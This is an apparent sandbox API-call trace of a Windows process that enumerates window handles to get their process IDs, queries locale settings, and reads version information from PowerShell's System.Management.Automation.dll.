	[0941.408] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x16ac
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1858
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1664
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x10b4
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x10ac
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x10ec
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1068
	[0941.408] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x17e0
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x102c
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x17a4
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1050
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1694
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1770
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1720
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x165c
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1578
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x16c0
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x161c
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1638
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x15c8
	[0941.409] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1554
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1674
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1520
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x14bc
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xf8c
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xe9c
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1434
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x14ec
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xfcc
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x12ac
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1484
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x934
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xc0c
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xb08
	[0941.410] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x948
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1178
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x13e0
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xcd0
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x13fc
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xdc8
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xc18
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xc2c
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xa1c
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1244
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xdb0
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1398
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1358
	[0941.411] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1370
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1340
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x130c
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x12c0
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x12e4
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1270
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1298
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x120c
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x122c
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x11c4
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x11b0
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1188
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1148
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1160
	[0941.412] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x10fc
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xe34
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xea4
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x514
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xe48
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xbc8
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xdf8
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x318
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xcac
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x8bc
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xf9c
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xf48
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xe40
	[0941.413] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xecc
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xeb8
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xe80
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xe98
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xe60
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xee4
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xf00
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xdf0
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xe1c
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xdd0
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xd94
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xd74
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xd00
	[0941.414] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xcd8
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xc84
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xca4
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xc64
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xc24
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xb84
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xbac
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x384
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xab8
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x33c
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xa44
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xa64
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x8a8
	[0941.415] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xaf0
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x88c
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xb04
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x910
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x230
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xac0
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xab4
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xaac
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x3d0
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x978
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xa7c
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x59c
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xa88
	[0941.416] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xa6c
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xa68
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x9f8
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xa04
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x924
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x8dc
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x7dc
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x768
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x764
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x820
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x810
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x794
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x83c
	[0941.417] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x7ac
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xb44
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x6bc
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0xb5c
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x838
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x4d0
	[0941.418] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x818
	[0941.419] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x5b8
	[0941.419] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x494
	[0941.419] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x1ec
	[0941.419] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x440
	[0941.419] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x7e8
	[0941.419] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x730
	[0941.419] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x2c8
	[0941.419] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x18d980 | out: lpdwProcessId=0x18d980) returned 0x31c
	[0941.422] WerSetFlags () returned 0x0
	[0941.654] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0941.655] CoTaskMemFree (pv=0x0) 
	[0941.655] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18dce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18dce0 | out: pulNumLanguages=0x18dce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18dce0) returned 1
	[0941.656] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18dce8, pwszLanguagesBuffer=0x2bef148, pcchLanguagesBuffer=0x18dce0 | out: pulNumLanguages=0x18dce8, pwszLanguagesBuffer=0x2bef148, pcchLanguagesBuffer=0x18dce0) returned 1
	[0941.660] CoTaskMemAlloc (cb=0x24) returned 0x3f48d0
	[0941.660] GetUserDefaultLocaleName (in: lpLocaleName=0x3f48d0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0941.660] CoTaskMemFree (pv=0x3f48d0) 
	[0941.687] CoTaskMemAlloc (cb=0x104) returned 0x400ca0
	[0941.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.687] CoTaskMemFree (pv=0x400ca0) 
	[0941.689] CoTaskMemAlloc (cb=0x104) returned 0x400ca0
	[0941.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.689] CoTaskMemFree (pv=0x400ca0) 
	[0941.691] CoTaskMemAlloc (cb=0x104) returned 0x400ca0
	[0941.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x400ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0941.691] CoTaskMemFree (pv=0x400ca0) 
	[0941.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0941.989] SetErrorMode (uMode=0x1) returned 0x1
	[0941.989] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18d960 | out: lpFileInformation=0x18d960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0941.990] SetErrorMode (uMode=0x1) returned 0x1
	[0941.990] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18dbd0 | out: lpdwHandle=0x18dbd0) returned 0x94c
	[0941.991] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf29d8 | out: lpData=0x2bf29d8) returned 1
	[0941.991] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18db48, puLen=0x18db40 | out: lplpBuffer=0x18db48*=0x2bf2a74, puLen=0x18db40) returned 1
	[0941.991] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2b50, puLen=0x18dab0) returned 1
	[0941.992] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0941.992] CoTaskMemAlloc (cb=0x2e) returned 0x3fa2e0
	[0941.992] lstrcpyW (in: lpString1=0x3fa2e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0941.992] CoTaskMemFree (pv=0x3fa2e0) 
	[0941.992] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2ba4, puLen=0x18dab0) returned 1
	[0941.992] lstrlenW (lpString="System.Management.Automation") returned 28
	[0941.992] CoTaskMemAlloc (cb=0x3c) returned 0x3fd7d0
	[0941.992] lstrcpyW (in: lpString1=0x3fd7d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0941.992] CoTaskMemFree (pv=0x3fd7d0) 
	[0941.992] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2c00, puLen=0x18dab0) returned 1
	[0941.992] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0941.992] CoTaskMemAlloc (cb=0x20) returned 0x3fa8f0
	[0941.992] lstrcpyW (in: lpString1=0x3fa8f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0941.992] CoTaskMemFree (pv=0x3fa8f0) 
	[0941.992] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2c40, puLen=0x18dab0) returned 1
	[0941.992] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0941.992] CoTaskMemAlloc (cb=0x44) returned 0x3fd7d0
	[0941.992] lstrcpyW (in: lpString1=0x3fd7d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0941.992] CoTaskMemFree (pv=0x3fd7d0) 
	[0941.992] VerQueryValueW (in: pBlock=0x2bf29d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18dab8, puLen=0x18dab0 | out: lplpBuffer=0x18dab8*=0x2bf2ca8, puLen=0x18dab0) returned 1
	[0941.992] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0941.992] CoTaskMemAlloc (cb=0x76) returned 0x39ad30
	[0941.992] lstrcpyW (in: lpString1=0x39ad30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0941.992] CoTaskMemFree (pv=0x39ad30) 
